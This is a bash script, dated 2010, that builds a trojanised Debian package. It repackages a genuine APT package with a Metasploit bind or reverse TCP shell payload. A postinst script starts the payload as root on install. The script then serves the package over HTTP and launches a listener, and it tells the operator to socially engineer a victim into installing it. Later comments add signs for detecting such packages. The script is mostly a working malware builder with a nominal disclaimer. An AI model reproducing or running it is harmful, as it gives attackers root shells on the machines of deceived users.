bash script to generate a Debian (.deb) package trojan using Metasploit payload

#!/bin/bash

# bash script to generate a Debian (.deb) package trojan using Metasploit payload
# Author:  Aaron Hine - @redmeat_uk
# Date: 31-01-2010

# Disclaimer: this script should be used for educational purposes.  You should obtain permission before running this against an individual or company.
# The author is not liable for any illegal use of this script.

# Name the script was invoked as; used only in the root-check message below.
scriptname=`basename "$0"`

  # Stop unless the invoking user's UID is 0. Later steps run apt-get and
  # move files out of /var/cache/apt/archives.
  if [[ $UID -ne 0 ]]; then
     echo "${scriptname} must be run as root"
     exit 1
  fi

# Banner printed once at start-up.
echo
echo "#####################################################################"
echo "Script to generate a Debian package trojan using a Metasploit payload"
echo "#####################################################################"
echo 

# change these vars to suit your needs
# msfdir  - directory holding the msfpayload and msfcli executables that are
#           invoked later (both are legacy Metasploit command-line tools).
# tmpdir  - fixed staging path under /tmp; created below and removed with
#           rm -rf once the rebuilt package has been moved out of it.
# workdir - tree the genuine package is unpacked into and rebuilt from.
msfdir="/opt/metasploit3/msf3"
tmpdir="/tmp/evildeb"
workdir="$tmpdir/work"

# prompt for package name and setup dirs
# The operator names an existing APT package. Its genuine .deb is fetched and
# used as the carrier, so the rebuilt file still contains the real program.
echo "Please enter the name of the APT package you wish to trojan:"
echo "Use apt-cache search <package> for ideas :)"
echo
read package
# --download-only leaves the .deb in apt's cache without installing it.
apt-get --download-only install $package
echo
mkdir $tmpdir
mkdir $workdir
# Move every cached archive whose name starts with the package name into the
# staging directory.
mv /var/cache/apt/archives/$package* $tmpdir
mkdir $workdir/DEBIAN
# dpkg -x unpacks the package's filesystem tree into workdir.
dpkg -x $tmpdir/$package* $workdir
# DEBIAN/control is rebuilt from the repository index record printed by
# apt-cache show, with the Original-Maintainer and SHA* lines deleted, so the
# name, version and description shown to the installer match the genuine
# package and are no evidence of authenticity.
# NOTE(review): only those two patterns are filtered. apt-cache show output
# typically also carries index-only fields such as Filename and Size; nothing
# here removes them, so a control file containing such fields is a sign that
# a package was rebuilt this way.
apt-cache show $package > $workdir/DEBIAN/control
cat $workdir/DEBIAN/control | sed '/^Original-Maintainer/d' | sed '/^SHA/d' > $workdir/DEBIAN/control2
mv $workdir/DEBIAN/control2 $workdir/DEBIAN/control
echo
# Payload menu. The answer selects one of two Metasploit Linux x86 shell
# payloads and collects the address and port stored in $options.
echo "Please choose your Metasploit payload"
echo "-------------------------------------"
echo 
echo "1. bind tcp"
echo "2. reverse tcp"
echo
echo "press number and hit return:"
read choice


# Choice 1: bind variant - the host that installs the package ends up
#           listening on the chosen TCP port.
# Choice 2: reverse variant - the host that installs the package connects
#           out to the address and port entered here.
# Either way the network activity starts from the package's postinst script,
# so a listener or outbound connection whose parent is a dpkg maintainer
# script is the behaviour to look for on an affected host.
# Any other numeric answer runs neither branch and leaves $payload and
# $options unset.
if [ "$choice" -eq 1 ]; then
        payload="linux/x86/shell/bind_tcp"
                echo "Enter IP:"
                read rhostIP
                echo "Enter port:"
                read bindport
                options="RHOST=$rhostIP LPORT=$bindport"
else
        if [ "$choice" -eq 2 ]; then
                payload="linux/x86/shell/reverse_tcp"
                echo "Enter IP:"
                read lhostIP
                echo "Enter port:"
                read revport
                options="LHOST=$lhostIP LPORT=$revport" 
        fi
fi

echo
# Ask for the name the payload file will carry inside the package.
echo "Please enter the filename for the Metasploit payload:"
read filename
echo

cd $workdir
# Executable regular files in the unpacked tree whose path contains the
# package name; the leading '.' is stripped so the result is an absolute
# path as it will exist on the installing host.
binary=`find . -executable -type f | grep $package | sed -e 's/^.//'`
trojan="$filename"

echo "Making post-install script..."
echo

# DEBIAN/postinst is a maintainer script that dpkg runs, as root, when the
# package is installed. The generated one-liner sets mode 2755 (setgid plus
# rwxr-xr-x) on the payload file, starts it in the background, and then
# starts the genuine program in the background.
# Review note: the variables are expanded now, so the postinst holds literal
# paths. It can be read before installation with `dpkg-deb -I <file>.deb` or
# extracted with `dpkg-deb -e <file>.deb <dir>`; a postinst that launches
# executables or uses sudo is not normal packaging behaviour.
echo "#!/bin/sh" > $workdir/DEBIAN/postinst
echo "" >> $workdir/DEBIAN/postinst
echo "" >> $workdir/DEBIAN/postinst
echo "sudo chmod 2755 $binary$trojan && $binary$trojan & $binary &" >> $workdir/DEBIAN/postinst

# Same path without the leading '/', i.e. relative to workdir. The payload
# lands next to the genuine executable, under that executable's name with the
# chosen filename appended - an extra file that the repository's copy of the
# package does not list (compare `dpkg-deb -c` output).
trojan2=`echo $binary$trojan | sed -e 's/^\///'`

echo "Thanks - generating your payload..."
# msfpayload writes the selected payload as an executable (output mode X)
# into the package tree.
$msfdir/msfpayload $payload $options X > $workdir/$trojan2
echo

cd $workdir/DEBIAN
chmod 755 postinst
# Rebuild the tree as $tmpdir/work.deb. The result is unsigned and its hash
# differs from the entry in the repository's signed index, so installing the
# package through APT from a signed repository would not yield this file;
# installing a downloaded .deb directly with dpkg performs no such check.
dpkg-deb --build $workdir
cd $tmpdir

# Publish the rebuilt package under the genuine package's name in a
# directory chosen by the operator, then delete the staging tree.
echo
echo "Please enter your webroot directory:"
read webroot
mv $tmpdir/work.deb $webroot/$package.deb
rm -rf $tmpdir

echo
echo "Trojan'd $package.deb created and placed in $webroot"
echo

# Python 2's built-in file server, bound to port 80; it serves whatever
# directory it is started in.
webserver="python -m SimpleHTTPServer 80"

echo "Would you like a Python webserver ? (y/n) :"
read svr
echo

# On "y"/"Y" the server is started in the background from the webroot, so
# the package is offered over plain HTTP as a single file rather than through
# an APT repository. Any other answer skips this step.
if [[ "$svr" == "y" || "$svr" == "Y" ]]; then
        cd $webroot
        $webserver & 
        echo
        else
           echo "Fair nuff, setup your own webserver :)"
           echo
fi

# Short pause before the final prompt.
sleep 1

echo "Would you like me to setup a metasploit handler ? (y/n) :"
echo
read handler
echo
# Delivery depends on the target downloading the file and installing it by
# hand. The shell runs as root because dpkg runs maintainer scripts as root.
echo "In the meantime, social engineer your victim in to browsing to your package"
echo "and get them to install it and wait for your root shell >)"
echo

# On "y"/"Y" start Metasploit's generic handler in the foreground with the
# same payload and options used to build the package. Any other answer ends
# the script after a message.
if [[ "$handler" == "y" || "$handler" == "Y" ]]; then
        echo
        $msfdir/msfcli exploit/multi/handler payload=$payload $options E
        else
                echo "Fair nuff, setup your own handler :)"
                echo
fi